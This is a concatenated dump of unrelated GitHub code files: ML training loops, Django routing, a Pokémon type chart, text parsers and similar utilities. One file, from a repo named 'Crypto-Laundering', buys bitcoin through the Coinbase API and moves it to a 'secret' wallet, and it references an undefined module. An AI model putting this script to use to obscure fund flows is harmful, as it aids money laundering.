self.get_longest_tp(tp, lens)\n tp = torch.cat(((tp[0] - 0.01).unsqueeze(0), tp))\n\n for i in range(seq_len):\n h_ode = odeint(self.node, h, tp[i:i + 2])[1]\n if i not in samp_ind and np.random.uniform(0, 1) >= samp_prob:\n prev_out = self.out(h.unsqueeze(1)).view(x.size(0), -1)\n h = self.gru(prev_out, h_ode)\n else:\n h = self.gru(x[:, i, :], h_ode)\n h_arr[:, i, :] = h\n\n return self.out(h_arr)\n","repo_name":"IanShi1996/LatentSegmentedODE","sub_path":"baseline_models.py","file_name":"baseline_models.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31224498113","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 3 12:32:17 2020\n\n@author: hamishgibbs\n\"\"\"\n\nimport pandas as pd\nfrom pyquadkey2 import quadkey\nfrom shapely.geometry import Polygon\n\ndef preprocess_population(fn):\n df = pd.read_csv(fn)\n df['quadkey'] = df['quadkey'].apply(lambda x: '{0:0>13}'.format(x)) \n df['n_crisis'] = pd.to_numeric(df['n_crisis'], errors = 'coerce')\n df['n_baseline'] = pd.to_numeric(df['n_baseline'], errors = 'coerce')\n \n return(df) \n\ndef tile_polygon(qk):\n \n qk = quadkey.QuadKey(str(qk))\n \n a1 = qk.to_geo(anchor = 1)\n a2 = qk.to_geo(anchor = 2)\n a3 = qk.to_geo(anchor = 3)\n a4 = qk.to_geo(anchor = 5) \n \n bottom_l = [a1[1], a1[0]]\n bottom_r = [a4[1], a4[0]]\n top_l = [a3[1], a3[0]]\n top_r = [a2[1], a2[0]]\n \n return(Polygon([bottom_l, bottom_r, top_r, top_l]))\n\n\ndef tile_centroid(qk):\n \n p = tile_polygon(qk).centroid\n \n return(p)","repo_name":"hamishgibbs/facebook_mobility_uk","sub_path":"src/data/TilePopulation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"158944423","text":"def avg(arr):\n sum=0\n for i in range(len(arr)):\n sum+=arr[i]\n ans=sum/len(arr)\n return ans\ndef highlow(arr):\n min=arr[0]\n max=0\n for i in range(len(arr)):\n if(min>arr[i]):\n min=arr[i]\n if(max= delta).sum().item(), au_var\n\ndef visualize_latent(args, vae, device, test_data):\n f = open('yelp_embeddings_z','w')\n g = open('yelp_embeddings_labels','w')\n\n test_data_batch, test_label_batch = test_data.create_data_batch_labels(batch_size=args.batch_size, device=device, batch_first=True)\n for i in range(len(test_data_batch)):\n batch_data = test_data_batch[i]\n batch_label = test_label_batch[i]\n batch_size, sent_len = batch_data.size()\n means, _ = vae.encoder.forward(batch_data)\n for i in range(batch_size):\n mean = means[i,:].cpu().detach().numpy().tolist()\n for val in mean:\n f.write(str(val)+'\\t')\n f.write('\\n')\n for label in batch_label:\n g.write(label+'\\n')\n # fo\n print(mean.size())\n print(logvar.size())\n # fooo\n\ndef divider():\n print(\"----------------------------------------------\")\n\n\n###############################################\n# MAIN TRAINING LOOP #\n###############################################\n\ndef main(args):\n divider()\n print(\"Using args:\")\n print(args)\n divider()\n\n # select device and signal if using cuda or no\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n args.device = device\n if args.cuda:\n print('Using cuda')\n \n # prepare dataset, splits, and vocab\n data, vocab = create_corpus(args)\n args.vocab_size = len(vocab)\n train_data, val_data, test_data = data\n \n # create model\n vae = create_model(args, vocab)\n divider()\n print(\"Model:\")\n print(vae)\n divider()\n \n if args.eval:\n print('begin evaluation')\n vae.load_state_dict(torch.load(args.load_path))\n vae.eval()\n with torch.no_grad():\n test_data_batch = test_data.create_data_batch(batch_size=args.batch_size,\n device=device,\n batch_first=True)\n\n test(vae, test_data_batch, \"TEST\", args)\n au, au_var = calc_au(vae, test_data_batch)\n print(\"%d active units\" % au)\n # print(au_var)\n\n test_data_batch = test_data.create_data_batch(batch_size=1,\n device=device,\n batch_first=True)\n calc_iwnll(vae, test_data_batch, args)\n\n return\n\n # miscellaneous initializations\n log_niter = (len(train_data)//args.batch_size)//10\n opt_dict = {\"not_improved\": 0, \"lr\": 1., \"best_loss\": 1e4}\n enc_optimizer = optim.SGD(vae.encoder.parameters(), lr=1.0, momentum=args.momentum)\n dec_optimizer = optim.SGD(vae.decoder.parameters(), lr=1.0, momentum=args.momentum)\n opt_dict['lr'] = 1.0\n iter_ = decay_cnt = 0\n best_loss = 1e4\n best_kl = best_nll = best_ppl = 0\n pre_mi = 0\n aggressive_flag = True if args.aggressive else False\n vae.train()\n start = time.time()\n kl_weight = args.kl_start\n anneal_rate = (1.0 - args.kl_start) / (args.warm_up * (len(train_data) / args.batch_size))\n\n # put data in batches\n train_data_batch = train_data.create_data_batch(batch_size=args.batch_size,\n device=device,\n batch_first=True)\n\n val_data_batch = val_data.create_data_batch(batch_size=args.batch_size,\n device=device,\n batch_first=True)\n\n test_data_batch = test_data.create_data_batch(batch_size=args.batch_size,\n device=device,\n batch_first=True)\n \n # begin the training loop\n print(\"Beginning training ...\")\n for epoch in range(args.epochs):\n print(\"Epoch %d:\" % epoch)\n report_kl_loss = report_rec_loss = 0\n report_num_words = report_num_sents = 0\n for i in np.random.permutation(len(train_data_batch)):\n batch_data = train_data_batch[i]\n batch_size, sent_len = batch_data.size()\n\n # not predict start symbol\n report_num_words += (sent_len - 1) * batch_size\n\n report_num_sents += batch_size\n\n # kl_weight = 1.0\n kl_weight = min(1.0, kl_weight + anneal_rate)\n\n sub_iter = 1\n batch_data_enc = batch_data\n burn_num_words = 0\n burn_pre_loss = 1e4\n burn_cur_loss = 0\n while aggressive_flag and sub_iter < 100:\n\n enc_optimizer.zero_grad()\n dec_optimizer.zero_grad()\n\n burn_batch_size, burn_sents_len = batch_data_enc.size()\n burn_num_words += (burn_sents_len - 1) * burn_batch_size\n\n loss, loss_rc, loss_kl = vae.loss(batch_data_enc, kl_weight, nsamples=args.nsamples)\n\n burn_cur_loss += loss.sum().item()\n loss = loss.mean(dim=-1)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(vae.parameters(), clip_grad)\n\n enc_optimizer.step()\n\n id_ = np.random.random_integers(0, len(train_data_batch) - 1)\n\n batch_data_enc = train_data_batch[id_]\n\n # every 15 iterations, check if the \n if sub_iter % 15 == 0:\n burn_cur_loss = burn_cur_loss / burn_num_words\n if burn_pre_loss - burn_cur_loss < 0:\n break\n burn_pre_loss = burn_cur_loss\n burn_cur_loss = burn_num_words = 0\n\n sub_iter += 1\n\n # if sub_iter >= 30:\n # break\n\n # print(sub_iter)\n\n enc_optimizer.zero_grad()\n dec_optimizer.zero_grad()\n\n\n loss, loss_rc, loss_kl = vae.loss(batch_data, kl_weight, nsamples=args.nsamples)\n\n loss = loss.mean(dim=-1)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(vae.parameters(), clip_grad)\n\n loss_rc = loss_rc.sum()\n loss_kl = loss_kl.sum()\n\n if not aggressive_flag:\n enc_optimizer.step()\n\n dec_optimizer.step()\n\n report_rec_loss += loss_rc.item()\n report_kl_loss += loss_kl.item()\n\n if iter_ % log_niter == 0:\n train_loss = (report_rec_loss + report_kl_loss) / report_num_sents\n if aggressive_flag or epoch == 0:\n vae.eval()\n with torch.no_grad():\n mi = calc_mi(vae, val_data_batch)\n au, _ = calc_au(vae, val_data_batch)\n vae.train()\n\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, mi: %.4f, recon: %.4f,' \\\n ' au %d, time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_sents, mi,\n report_rec_loss / report_num_sents, au, time.time() - start))\n else:\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, recon: %.4f,' \\\n 'time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_sents,\n report_rec_loss / report_num_sents, time.time() - start))\n\n sys.stdout.flush()\n\n report_rec_loss = report_kl_loss = 0\n report_num_words = report_num_sents = 0\n\n iter_ += 1\n\n if aggressive_flag and (iter_ % len(train_data_batch)) == 0:\n vae.eval()\n cur_mi = calc_mi(vae, val_data_batch)\n vae.train()\n print(\"pre mi:%.4f. cur mi:%.4f\" % (pre_mi, cur_mi))\n if cur_mi - pre_mi < 0:\n aggressive_flag = False\n print(\"STOP BURNING\")\n\n pre_mi = cur_mi\n\n print('kl weight %.4f' % kl_weight)\n\n vae.eval()\n with torch.no_grad():\n loss, nll, kl, ppl, mi = test(vae, val_data_batch, \"VAL\", args)\n au, au_var = calc_au(vae, val_data_batch)\n print(\"%d active units\" % au)\n # print(au_var)\n\n if loss < best_loss:\n print('update best loss')\n best_loss = loss\n best_nll = nll\n best_kl = kl\n best_ppl = ppl\n torch.save(vae.state_dict(), args.save_path)\n\n if loss > opt_dict[\"best_loss\"]:\n opt_dict[\"not_improved\"] += 1\n if opt_dict[\"not_improved\"] >= decay_epoch and epoch >=15:\n opt_dict[\"best_loss\"] = loss\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"lr\"] = opt_dict[\"lr\"] * lr_decay\n vae.load_state_dict(torch.load(args.save_path))\n print('new lr: %f' % opt_dict[\"lr\"])\n decay_cnt += 1\n enc_optimizer = optim.SGD(vae.encoder.parameters(), lr=opt_dict[\"lr\"], momentum=args.momentum)\n dec_optimizer = optim.SGD(vae.decoder.parameters(), lr=opt_dict[\"lr\"], momentum=args.momentum)\n \n else:\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"best_loss\"] = loss\n\n if decay_cnt == max_decay:\n break\n\n if epoch % args.test_nepoch == 0:\n with torch.no_grad():\n loss, nll, kl, ppl, _ = test(vae, test_data_batch, \"TEST\", args)\n\n if epoch % args.sample_every == 0:\n print(\"Generating samples for epoch #{} ...\".format(epoch + 1))\n test_generation(vae, vocab, args, epoch)\n print(\"... sample generation successful\")\n \n vae.train()\n\n # compute importance weighted estimate of log p(x)\n vae.load_state_dict(torch.load(args.save_path))\n\n vae.eval()\n with torch.no_grad():\n loss, nll, kl, ppl, _ = test(vae, test_data_batch, \"TEST\", args)\n au, au_var = calc_au(vae, test_data_batch)\n print(\"%d active units\" % au)\n # print(au_var)\n\n test_data_batch = test_data.create_data_batch(batch_size=1,\n device=device,\n batch_first=True)\n with torch.no_grad():\n calc_iwnll(vae, test_data_batch, args)\n\nif __name__ == '__main__':\n args = init_config()\n main(args)\n","repo_name":"sbarham/lv-nlm-he-2019","sub_path":".ipynb_checkpoints/text-checkpoint.py","file_name":"text-checkpoint.py","file_ext":"py","file_size_in_byte":17434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32605931552","text":"strongTo = {\n 'normal' : ['ghost*'],\n 'fire' : ['steel', 'fire', 'grass', 'ice', 'bug', 'fairy'],\n 'water' : ['fire', 'water', 'ice', 'steel'],\n 'grass' : ['water', 'grass', 'electric', 'ground'],\n 'electric' : ['electric', 'flying', 'steel'],\n 'flying' : ['ground*', 'grass', 'fighting', 'bug'],\n 'ground' : ['electric*', 'rock', 'poison'],\n 'rock' : ['poison', 'normal', 'fire', 'flying'],\n 'fighting' : ['dark', 'rock', 'bug'],\n 'ice' : ['ice'],\n 'poison' : ['poison', 'bug', 'fairy', 'fighting', 'grass'],\n 'bug' : ['fighting', 'grass', 'ground'],\n 'ghost' : ['normal*', 'fighting*', 'poison', 'bug'],\n 'psychic' : ['psychic', 'fighting'],\n 'dragon' : ['electric', 'fire', 'water', 'grass'],\n 'dark' : ['psychic*', 'dark', 'ghost'],\n 'fairy' : ['dragon*', 'dark', 'fighting', 'bug'],\n 'steel' : ['ice', 'normal', 'grass', 'flying', 'rock', 'poison*', 'psychic', 'dragon', 'fairy', 'steel', 'bug']\n}\n\nweakTo = {\n 'normal' : ['fighting'],\n 'fire' : ['water', 'ground', 'rock'],\n 'water' : ['grass', 'electric'],\n 'grass' : ['fire', 'flying', 'ice', 'poison', 'bug'],\n 'electric' : ['ground'],\n 'flying' : ['electric', 'rock', 'ice'],\n 'ground' : ['water', 'grass', 'ice'],\n 'rock' : ['water', 'grass', 'ground', 'fighting', 'steel'],\n 'fighting' : ['flying', 'psychic', 'fairy'],\n 'ice' : ['fire', 'rock', 'fighting', 'steel'],\n 'poison' : ['ground', 'psychic'],\n 'bug' : ['fire', 'flying', 'rock'],\n 'ghost' : ['ghost', 'dark'],\n 'psychic' : ['bug', 'ghost', 'dark'],\n 'dragon' : ['ice', 'dragon', 'fairy'],\n 'dark' : ['fighting', 'bug', 'fairy'],\n 'fairy' : ['poison', 'steel'],\n 'steel' : ['fire', 'ground', 'fighting']\n}\n\ndef getWeakness(t):\n if t in weakTo.keys():\n return weakTo[t]\n else:\n return []\n\ndef getStrength(t):\n if t in strongTo.keys():\n return strongTo[t]\n else:\n return []\n\ndef main():\n t = input('enter type: ')\n while t:\n print('\\nWeak to:')\n for x in getWeakness(t):\n print(' -', x)\n print('\\n* indicates immunity')\n print('Resistant to:')\n for x in getStrength(t):\n print(' +', x)\n t = input('\\nenter type: ')\n\nif __name__=='__main__':\n main()","repo_name":"devmart10/dev","sub_path":"python/pokemon/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42472181835","text":"def Valida_Palavra_Desafiador(vDesafiado):\n verPalavra = ''\n vMsg = ''\n while True:\n print('Ao digitar uma palavra composta, irá ser subtituído o ESPAÇO por HÍFEN')\n verPalavra = input(f'Escolha a palavra que deseja que o jogador {vDesafiado} advinhe.\\n')\n if len(verPalavra) <= 1:\n print(f'A palavra deve conter mais que \"UMA\" letra')\n else:\n verPalavra = Ajusta_Palavra_Composta(verPalavra)\n if Validate_Palavra(verPalavra, 'S'):\n break\n return verPalavra\n\ndef Validate_Palavra(Palavra = str, Mostra_Msg = 'N', Valida_Hifen = 'N'):\n condicao = '()*&¨%$#@!¹²³£¢¬:><.,^~][´`_=+/?|\\ }{ùúàáãõóòìíçÙÚÀÁÃÕÓÒÌÍÇ123456789' if Valida_Hifen == 'N' else '()*&¨%$#@!¹²³£¢¬:><.,^~][´`_=+/?|\\ }{ùúàáãõóòìíçÙÚÀÁÃÕÓÒÌÍÇ123456789-'\n\n if Palavra in condicao:\n if Mostra_Msg == 'S':\n if Valida_Hifen == 'N':\n print('Por favor informe apenas letras! Único caracter além das letras que é permitido é o HÍFEN', 'S')\n else:\n print('Por favor informe apenas letras!', 'S')\n return False\n else:\n return True\n\ndef Ajusta_Palavra_Composta(Palavra):\n verPalavra = ''\n verPalavra = Palavra\n return verPalavra.replace(' ', '-')","repo_name":"lucasdeazandona/Jogo_Da_Forca","sub_path":"ValidaPalavra/ValidacaoPalavras.py","file_name":"ValidacaoPalavras.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17518351014","text":"from django.conf import settings\nfrom django.db import models\n\n\n# Create your models here.\nclass Car(models.Model):\n objects = None\n\n title = models.CharField(max_length=100, verbose_name='название') # Поле для названия (максимум 100 символов)\n description = models.TextField(verbose_name='описание') # Поле для описания (текстовое поле)\n owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True, blank=True)\n amount = models.IntegerField(default=1000, verbose_name=\"Цена\")\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Машина'\n verbose_name_plural = 'Машины'\n\n\nclass Moto(models.Model):\n objects = None\n\n title = models.CharField(max_length=100, verbose_name='название') # Поле для названия (максимум 100 символов)\n description = models.TextField(verbose_name='описание') # Поле для описания (текстовое поле)\n owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True, blank=True)\n\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name = 'Мотоцикл'\n verbose_name_plural = 'Мотоциклы'\n\n\nclass Milage(models.Model):\n objects = None\n car = models.ForeignKey(Car, on_delete=models.CASCADE, null=True, blank=True, related_name='milage')\n moto = models.ForeignKey(Moto, on_delete=models.CASCADE, null=True, blank=True, related_name='milage')\n\n milage = models.PositiveIntegerField(verbose_name='Пробег')\n year = models.PositiveSmallIntegerField(verbose_name='Год регистрации')\n\n def __str__(self):\n return f'{self.moto if self.moto else self.car} - {self.year}'\n\n class Meta:\n verbose_name = 'Пробег'\n verbose_name_plural = 'Пробег'\n ordering = ('-year',)\n","repo_name":"Lekantrop74/Sky_Pro_Lesson_24_26","sub_path":"vehicle/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74363629492","text":"#!/usr/bin/env python3\n\nfrom ctypes import c_int, pointer, byref\nfrom ctypes import CDLL, POINTER\nfrom time import sleep\n\nCONFIG_ENABLE_MANUAL_MODE = False\n\nnum = c_int(-1)\npnum = pointer(num)\n\nf = CDLL(\"./bgtask.so\").bgtask\nf.argtypes = [POINTER(c_int),]\nf(byref(num))\n\nprint(\"please press the key with a consistent interval repeatedly\")\nprev = 0\nfirstdot = True\nwhile True:\n if CONFIG_ENABLE_MANUAL_MODE:\n input()\n else:\n sleep(0.3)\n print()\n cur = num.value\n if prev == cur:\n if firstdot: print()\n print(\" .\", end=\"\")\n firstdot = False\n else:\n if firstdot: print()\n print(\"%4dms\" % cur, end=\"\")\n firstdot = True\n prev = cur\n\n","repo_name":"Un1Gfn/jangaehwepi","sub_path":"ex4_py_byref_pthread/bgtask.py","file_name":"bgtask.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31427563519","text":"from model import *\n\n\ndef printDay(elem):\n print(\"id: \" + str(elem[\"id\"]) + \" Date:\" + elem['date'] + \" t = \" + str(elem['temperature']) + \" in the yard is\" + elem['weather'])\n\n\nwhile True:\n x = 0\n while x < 1 or x > 4:\n print(\"---weather forecast---\")\n print(\"1) get all the data from the diary\")\n print(\"2) get by id\")\n print(\"3) add new day\")\n print(\"4) delete some day\")\n x = int(input())\n if x < 1 or x > 4:\n print(\"enter 1, 2, 3 or 4\")\n if x == 1:\n days = getAll()\n for day in days:\n printDay(day)\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n else:\n if x == 2:\n id = int(input(\"Enter id\"))\n printDay(getById(id))\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n else:\n if x == 3:\n id = int(input(\"Enter id \"))\n t = int(input(\"Enter temperature \"))\n w = input(\"Enter weather type \")\n if add(id, t, w):\n print(\"Added\")\n else:\n print(\"not added\")\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n else:\n if x == 4:\n id = int(input(\"Enter id \"))\n if getById(id):\n print(\"Deleted element:\")\n printDay(delById(id))\n else:\n print(\"Error\")\n r = input(\"press x to exit or any key to go back \")\n if r == \"x\":\n break\n","repo_name":"annaprok/Weather-Diary","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22527424229","text":"# btc_purchase.py\n# purchase Bitcoin using coinbase API\n#\n# HingOn Miu\n\n# https://developers.coinbase.com/api/v2\n# https://github.com/coinbase/coinbase-python\n\nimport io\nimport pycurl\nimport random\nimport string\nimport json\nimport time\nfrom coinbase.wallet.client import Client\n\n\n# your secret blockchain.info wallet (see secret_wallet.py)\nbitcoin_address_of_secret_wallet = \"\"\n\n# USD amount to send to final target eg. \"5000\"\nusd_amount = \"\"\n\n# register coinbase account and enable API keys\n# https://developers.coinbase.com/docs/wallet/api-key-authentication\ncoinbase_api_key = \"\"\ncoinbase_api_secret = \"\"\n\n\n\n# create coinbase client with your credentials\nclient = Client(coinbase_api_key, coinbase_api_secret)\n\n\n# fetch default account ID from your coinbase account\nprint(term.format(\"Fetch Account Info\\n\", term.Attr.BOLD))\naccounts_response = client.get_accounts()\nprint(term.format(accounts_response, term.Color.BLUE))\naccount_id = json.loads(accounts_response)[\"data\"][0][\"id\"]\n\n\n# check real time bitcoin price (total USD to buy one bitcoin)\nprint(term.format(\"Check Bitcoin Price\\n\", term.Attr.BOLD))\nbitcoin_price_response = client.get_buy_price(currency_pair = 'BTC-USD')\nprint(term.format(bitcoin_price_response, term.Color.BLUE))\nbitcoin_price = float(json.loads(bitcoin_price_response)[\"data\"][\"amount\"])\n\n\n# convert USD amount to bitcoin\nbitcoin_amount = str(usd_amount / bitcoin_price)\n\n\n# fetch default payment method ID from your coinbase account\nprint(term.format(\"Fetch Payment Method\\n\", term.Attr.BOLD))\npayment_methods_response = client.get_payment_methods()\nprint(term.format(payment_methods_response, term.Color.BLUE))\npayment_method_id = json.loads(payment_methods_response)[\"data\"][0][\"id\"]\n\n\n# buy bitcoin and commit order immediately\nprint(term.format(\"Purchase Bitcoin\\n\", term.Attr.BOLD))\nbuy_response = client.buy(account_id, amount=bitcoin_amount, currency=\"BTC\",\n commit= True, payment_method=payment_method_id)\nprint(term.format(buy_response, term.Color.BLUE))\n\n\n# verify purchase time\nbuy_time = json.loads(buy_response)[\"data\"][\"payout_at\"]\nprint(term.format(\"Purchased Bitcoin at \" + buy_time + \"\\n\", term.Attr.BOLD))\n\n\n# send purchased bitcoin to your secret blockchain.info wallet (see secret_wallet.py)\nprint(term.format(\"Transfer Bitcoin to Secret Wallet\\n\", term.Attr.BOLD))\ntransaction_response = client.send_money(account_id, to=bitcoin_address_of_secret_wallet, \n amount=bitcoin_amount, currency='BTC')\nprint(term.format(transaction_response, term.Color.BLUE))\ntransaction_id = json.loads(transaction_response)[\"data\"][\"id\"]\ntransaction_status = json.loads(transaction_response)[\"data\"][\"status\"]\n\n\n# keep checking until transaction is completed\nprint(term.format(\"Check Transaction Status\\n\", term.Attr.BOLD))\nwhile transaction_status != \"completed\":\n # check status every 5 seconds\n time.sleep(5)\n transaction_response = client.get_transaction(account_id, transaction_id)\n transaction_status = json.loads(transaction_response)[\"data\"][\"status\"]\n print(term.format(transaction_status + \"\\n\", term.Attr.BOLD))\n\n\n# alert transaction is completed\nprint(term.format(\"Bitcoin Transaction Completed\\n\", term.Attr.BOLD))\n\n\n\n\n","repo_name":"miuho/Crypto-Laundering","sub_path":"btc_purchase.py","file_name":"btc_purchase.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20585531967","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib.gis import admin\nimport settings\n\nfrom django.contrib.sitemaps.views import sitemap\nfrom django.contrib.sitemaps import FlatPageSitemap, GenericSitemap\nfrom apps.core.models import Recorrido, Linea, Parada\nfrom apps.catastro.models import Poi\n\n# Uncomment the next two lines to enable the admin:\nadmin.autodiscover()\n\nsitemaps = {\n 'flatpages': FlatPageSitemap,\n 'lineas': GenericSitemap({\n 'queryset': Linea.objects.all(),\n }, priority=0.6),\n 'recorridos': GenericSitemap({\n 'queryset': Recorrido.objects.all(),\n }, priority=0.6),\n 'pois': GenericSitemap({\n 'queryset': Poi.objects.all(),\n }, priority=0.6),\n 'paradas': GenericSitemap({\n 'queryset': Parada.objects.all(),\n }, priority=0.4),\n}\n\nurlpatterns = patterns('',\n # Archivos estaticos\n (r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}),\n\n # APPS de CualBondi\n url(r'^api/v2/', include('apps.api2.urls')),\n url(r'^api/v1/', include('apps.api.urls')),\n url(r'^api/', include('apps.api.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url('', include('social.apps.django_app.urls', namespace='social')),\n url(r'^usuarios/', include('apps.usuarios.urls')),\n url(r'^widget/', include('apps.widget.urls')),\n url(r'^mobile_updates/', include('apps.mobile_updates.urls')),\n url(r'^editor/', include('apps.editor.urls')),\n url(r'^revision/(?P\\d+)/$', 'apps.editor.views.revision', name='revision_externa'),\n\n url(r'^como-llegar/', include('apps.catastro.urls')),\n \n url(r'^contacto/', 'apps.core.views.contacto', name='contacto'),\n \n # Ranking aka agradecimientos\n url(r'^agradecimientos/$', 'apps.core.views.agradecimientos', name='agradecimientos'),\n\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap'),\n\n url(r'^', include('apps.core.urls')),\n)\n","repo_name":"cualbondi/old-web","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"71484922293","text":"#!/usr/bin/env python\nimport numpy as np\nimport matplotlib.pyplot as plt\nfile=\"../burgers_run.bin\"\nnx=1000\nN=101\nXs=np.fromfile(file, dtype=\"double\", count=-1).reshape(N,nx)\n\n#print(Xs)\nplot_dt=10\n\nxcoord=np.arange(0,nx)\nfor i in range(0,N,plot_dt):\n print(i)\n plt.figure()\n plt.plot(xcoord, Xs[i][:], '-o')\n\n\n\n","repo_name":"shensimeteor/IndepdentStudy_SLAM","sub_path":"Burgers/scripts/plot_burgers.py","file_name":"plot_burgers.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5271843566","text":"import logging\nimport re\nfrom typing import Any, Dict, Iterable, List, Tuple\n\nfrom bs4 import BeautifulSoup\n\nfrom zam_repondeur.exceptions.alert import AlertOnData\nfrom zam_repondeur.models import Lecture, Phase, Texte\nfrom zam_repondeur.services.clean import clean_all_html, clean_html_except_tables\n\nfrom .parseur import Parseur\n\nlogger = logging.getLogger(__name__)\n\nSUFFIXE_URL = {\n # ( partie, phase ) : SUFFIXE\n (1, Phase.PREMIERE_LECTURE): \"A\",\n (1, Phase.DEUXIEME_LECTURE): \"B\",\n (2, Phase.PREMIERE_LECTURE): \"C\",\n (2, Phase.DEUXIEME_LECTURE): \"D\",\n (None, Phase.NOUVELLE_LECTURE): \"\",\n (None, Phase.LECTURE_DEFINITIVE): \"\",\n}\n\nSTOP_TAGS = [\"h1\", \"h2\", \"h3\", \"h4\", \"h5\"]\n\n\nclass ParseurPLF(Parseur):\n \"\"\"\n Parser to handle Projet de loi de finance\n \"\"\"\n\n def __init__(self, lecture: Lecture):\n self.suffixe = SUFFIXE_URL[(lecture.partie, lecture.phase)]\n super().__init__(lecture)\n if not self.suffixe:\n self.parseur_type = \"DEFAULT\"\n else:\n self.parseur_type = \"PLF\"\n\n def get_texte_url(self, lecture: Lecture) -> str:\n \"\"\"\n Infos de l'AN pour la construction d'urls:\n La règle concernant le nommage des PLF est la suivante :\n A : 1ere partie, 1ere délibération\n B : 1ere partie, 2e délibération\n C : 2e partie, 1ere délibération\n D : 2e partie, 2e délibération\n \"\"\"\n self.lecture = lecture\n texte: Texte = lecture.texte\n prefix = f\"{self.an_url}{texte.legislature}\"\n numero = f\"{texte.numero:04}\"\n url = f\"{prefix}/textes/{numero}{self.suffixe}.asp\"\n return url\n\n def get_num_article(self, article: BeautifulSoup) -> str:\n\n words = re.compile(r\"\\W+\")\n article_title_raw = clean_all_html(f\"{article}\").replace(\"\\n\", \"\")\n matched_list = words.split(article_title_raw)\n if not matched_list[0] == \"Article\":\n raise AlertOnData(\n f\"Numéro d'article non récupérable {matched_list}\", \"data\", 3\n )\n clean_num = \"\"\n num = re.compile(r\"\\d+\")\n for index, value in enumerate(matched_list[1:]):\n match = num.match(value)\n if not match and index > 0:\n clean_num += \" \"\n clean_num += value\n return clean_num\n\n def clean_pastille_content(self, pastille: BeautifulSoup) -> str:\n if \"\" in f\"{pastille}\":\n content_raw = clean_html_except_tables(f\"{pastille}\").replace(\"\\n\", \"\")\n else:\n content_raw = clean_all_html(f\"{pastille}\").replace(\"\\n\", \"\")\n return re.sub(\" {2,}\", \" \", content_raw).strip()\n\n def is_new_pastille(self, pastille_raw: str) -> bool:\n p = re.compile(r\"\\(\\d+\\)\")\n m = p.match(pastille_raw)\n if m:\n return True\n return False\n\n def is_next_article(self, element: BeautifulSoup) -> bool:\n if \"attrs\" in element.__dict__.keys():\n if \"class\" in element.attrs.keys():\n return \"aFPFTprojetitrarticle\" in element[\"class\"]\n return False\n\n def is_next_titre(self, element: BeautifulSoup) -> bool:\n if \"attrs\" in element.__dict__.keys():\n if \"class\" in element.attrs.keys():\n return (\n \"titre\" in element[\"class\"][0] and \"projet\" in element[\"class\"][0]\n )\n return False\n\n def is_condition_arret(self, element: BeautifulSoup) -> bool:\n if element.name in STOP_TAGS:\n return True\n if self.is_next_article(element):\n return True\n if self.is_next_titre(element):\n return True\n if element.name == \"p\":\n return False\n for child in element.children:\n if child.name in STOP_TAGS:\n return True\n if self.is_next_article(element):\n return True\n if self.is_next_titre(child):\n return True\n return False\n\n def get_next_pastille(self, elements: BeautifulSoup) -> Iterable[str]:\n result: List = []\n for element in elements:\n if self.is_condition_arret(element):\n if result:\n yield \" \".join(result)\n result = []\n break\n current = self.clean_pastille_content(element)\n if not current:\n continue\n new_pastille = self.is_new_pastille(current)\n if new_pastille:\n if result:\n yield \" \".join(result)\n result = [current]\n else:\n result.append(current)\n if result:\n yield \" \".join(result)\n\n def get_articles(self) -> Iterable[Tuple]:\n\n dict_article: Dict[Any, Any] = dict()\n\n content = self.download_html()\n try:\n soup = BeautifulSoup(content, features=\"lxml\")\n except AlertOnData:\n raise\n except Exception:\n logger.error(\n f\"Scraping of lecture {self.lecture}, {self.url} : \\\nErreur lors de l'initialisation de 